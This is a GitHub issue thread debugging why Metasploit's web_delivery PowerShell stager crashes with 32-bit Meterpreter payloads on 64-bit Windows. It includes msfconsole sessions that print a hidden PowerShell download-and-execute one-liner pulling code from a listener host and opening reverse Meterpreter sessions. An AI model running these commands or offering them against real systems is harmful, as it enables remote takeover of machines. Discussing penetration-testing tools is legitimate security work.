Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

PowerShell web_delivery crashing targets' powershell.exe #10502

Open
Clickbaitcake opened this issue Aug 21, 2018 · 9 comments

Comments

Projects
None yet
7 participants
@Clickbaitcake
Copy link

commented Aug 21, 2018

Steps to reproduce

How'd you do it?

Exploit: multi/script/web_delivery
payload: windows/meterpreter/reverse_https)

Module options (exploit/multi/script/web_delivery):

Name Current Setting Required Description


SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 443 yes The local port to listen on.
SSL true no Negotiate SSL for incoming connections
SSLCert /root/unified.pem no Path to a custom SSL certificate (default is randomly generated)
URIPATH / no The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_https):

Name Current Setting Required Description


EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST ads.symxxx.xxx yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path

Exploit target:

Id Name


3 Regsvr32

This exploit was working absolutely fine yesterday.

Expected behavior

A sessions should start.

Current behavior

Powershell.exe crashes when running the supplied command.

You might also want to check the last ~1k lines of
/opt/metasploit/apps/pro/engine/config/logs/framework.log or
~/.msf4/logs/framework.log for relevant stack traces

System stuff

Ubuntu 18 x64
Attacking Windows 10 ent 1709 x64

Metasploit version

Framework: 4.17.5-dev
Console : 4.17.5-dev

Get this with the version command in msfconsole (or git log -1 --pretty=oneline for a source install).

I installed Metasploit with:

  • Kali package via apt
  • [X ] Omnibus installer (nightly)
  • Commercial/Community installer (from versi)
  • Source install (please specify ruby version)

OS

Ubuntu 18.0

Is this issue related to the version that I have pulled? -dev?

@Kali-Viking

This comment has been minimized.

Copy link

commented Sep 4, 2018

Framework v4.17.9-dev, in the same module, the "windows/meterpreter/reverse_tcp" payload also causes the same issue. The exploit runs fine, but as soon as you copy and paste the (Target 2 - PSH) Powershell code into the target and run it, either it will not execute or Powershell errors out. Happens on both 32 & 64 bit systems running Win7 or Win10.

The exploit works as expected in Framework v4.17.3-dev.

@Clickbaitcake

This comment has been minimized.

Copy link
Author

commented Sep 4, 2018

@viris

This comment has been minimized.

Copy link

commented Sep 6, 2018

Try with this payload:
set payload windows/x64/meterpreter/reverse_https

It looks like there is 32 or x64 issue ;)

@jmartin-r7

This comment has been minimized.

Copy link
Contributor

commented Sep 25, 2018

Sorry for the delayed response here.

Omnibus nightly installers are all marked as -dev as they are constantly updated. Currently builds are from the 4.x branch.

Can you add more detail? I don't show anything I would suspect to impact powershell has landed since Jun 25th. Can you offer details as to how you are launching?

The payloads you are referring to would not be compatible with the web_delivery module. Also the default target type for web_delivery is python, using set target 2 would actually be required for a powershell compatible transfer to generate.

$ ./msfconsole -qx "use exploit/multi/script/web_delivery; set payload windows/meterpreter/reverse_tcp; set LHOST en0; exploit"
payload => windows/meterpreter/reverse_tcp
LHOST => en0
[-] Exploit failed: windows/meterpreter/reverse_tcp is not a compatible payload.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/script/web_delivery) > exit
$ ./msfconsole -qx "use exploit/multi/script/web_delivery; set payload windows/x64/meterpreter/reverse_https; set LHOST en0; exploit"
payload => windows/x64/meterpreter/reverse_https
LHOST => en0
[-] Exploit failed: windows/x64/meterpreter/reverse_https is not a compatible payload.
[*] Exploit completed, but no session was created.

Your report also refers to payload options being set this should help with ensuring targeting on what is delivered to reach your handler, but again the payloads you refer to are not compatible with web_delivery.

@Kali-Viking

This comment has been minimized.

Copy link

commented Oct 3, 2018

@jmartin-r7 - not sure if you saw my comments:

Framework v4.17.9-dev, in the same module, the "windows/meterpreter/reverse_tcp" payload also causes the same issue. The exploit runs fine, but as soon as you copy and paste the (Target 2 - PSH) Powershell code into the target and run it, either it will not execute or Powershell errors out. Happens on both 32 & 64 bit targets running Win7 or Win10.

The exploit works as expected in Framework v4.17.3-dev.

@jmartin-r7

This comment has been minimized.

Copy link
Contributor

commented Oct 4, 2018

@Kali-Viking thanks for the clarification, think I have been able to reproduce the original issue here.

This impacts 32-bit meterpeter on 64-bit systems, tests show windows/meterpreter/reverse_tcp fails however windows/x64/meterpreter/reverse_tcp succeeds on clean systems.

4.17.3 with 32-bit

$ ./msfconsole -qx "use exploit/multi/script/web_delivery; set TARGET 2; set payload windows/meterpreter/reverse_tcp; set LHOST 172.16.69.1; set LPORT 4445; exploit"
TARGET => 2
payload => windows/meterpreter/reverse_tcp
LHOST => 172.16.69.1
LPORT => 4445
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 172.16.69.1:4445
msf exploit(multi/script/web_delivery) > [*] Using URL: http://0.0.0.0:8080/qG15Oz
[*] Local IP: http://192.168.25.109:8080/qG15Oz
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $Q=new-object net.webclient;$Q.proxy=[Net.WebRequest]::GetSystemWebProxy();$Q.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $Q.downloadstring('http://172.16.69.1:8080/qG15Oz');

msf exploit(multi/script/web_delivery) >
[*] 172.16.69.227    web_delivery - Delivering Payload
[*] Sending stage (179779 bytes) to 172.16.69.227
[*] Meterpreter session 1 opened (172.16.69.1:4445 -> 172.16.69.227:49671) at 2018-10-03 20:35:00 -0500

4.x master with 64-bit

$ ./msfconsole -qx "use exploit/multi/script/web_delivery; set TARGET 2; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 172.16.69.1; set LPORT 4445; exploit"
TARGET => 2
payload => windows/x64/meterpreter/reverse_tcp
LHOST => 172.16.69.1
LPORT => 4445
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 172.16.69.1:4445
msf exploit(multi/script/web_delivery) > [*] Using URL: http://0.0.0.0:8080/jZ5gy5P
[*] Local IP: http://192.168.25.109:8080/jZ5gy5P
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://172.16.69.1:8080/jZ5gy5P');

msf exploit(multi/script/web_delivery) >
[*] 172.16.69.227    web_delivery - Delivering Payload
[*] Sending stage (206403 bytes) to 172.16.69.227
[*] Meterpreter session 1 opened (172.16.69.1:4445 -> 172.16.69.227:49673) at 2018-10-03 20:30:06 -0500

4.x master with 32-bit

$ ./msfconsole -qx "use exploit/multi/script/web_delivery; set TARGET 2; set payload windows/meterpreter/reverse_tcp; set LHOST 172.16.69.1; set LPORT 4445; exploit"
TARGET => 2
payload => windows/meterpreter/reverse_tcp
LHOST => 172.16.69.1
LPORT => 4445
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 172.16.69.1:4445
msf exploit(multi/script/web_delivery) > [*] Using URL: http://0.0.0.0:8080/p3DGocvT7kzJpj
[*] Local IP: http://192.168.25.109:8080/p3DGocvT7kzJpj
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $U=new-object net.webclient;$U.proxy=[Net.WebRequest]::GetSystemWebProxy();$U.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $U.downloadstring('http://172.16.69.1:8080/p3DGocvT7kzJpj');

msf exploit(multi/script/web_delivery) >
[*] 172.16.69.227    web_delivery - Delivering Payload

msf exploit(multi/script/web_delivery) > exit

[*] Server stopped.

Further investigation is in progress, I have determined that reverting metasploit-payloads gem still results in failure with 32-bit payloads

Using metasploit-payloads 1.3.40 (was 1.3.52)
...
$ ./msfconsole -qx "use exploit/multi/script/web_delivery; set TARGET 2; set payload windows/meterpreter/reverse_tcp; set LHOST 172.16.69.1; set LPORT 4445; exploit"
TARGET => 2
payload => windows/meterpreter/reverse_tcp
LHOST => 172.16.69.1
LPORT => 4445
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 172.16.69.1:4445
msf exploit(multi/script/web_delivery) > [*] Using URL: http://0.0.0.0:8080/p7Pjm9TJ
[*] Local IP: http://192.168.25.109:8080/p7Pjm9TJ
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $l.downloadstring('http://172.16.69.1:8080/p7Pjm9TJ');

msf exploit(multi/script/web_delivery) >
[*] 172.16.69.227    web_delivery - Delivering Payload

msf exploit(multi/script/web_delivery) >
@rrsit

This comment has been minimized.

Copy link

commented Oct 22, 2018

same problem here.

Version Framework: 4.17.18-dev
tested on windows 10 and windows 7
tried viris' suggestion (set payload windows/x64/meterpreter/reverse_https) then the session opens, but cannot execute any commands.

msf exploit(multi/script/web_delivery) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > ls
[-] Unknown command: ls.

@jmartin-r7

This comment has been minimized.

Copy link
Contributor

commented Nov 20, 2018

#10931 may be related to this.

@KevinBollengier

This comment has been minimized.

Copy link

commented Nov 30, 2018

Using this exploit module I'm not able to execute the payload windows/x64/meterpreter/reverse_tcp with target 2 PSH on Windows 10 devices. I am able to retrieve a meterpreter shell on Windows 7 service pack 1.0.

Does anyone know why the generated powershell payload doesn't work on Windows 10 systems (on which i have remote system level privileges)?

@Green-m Green-m added the bug label Dec 26, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.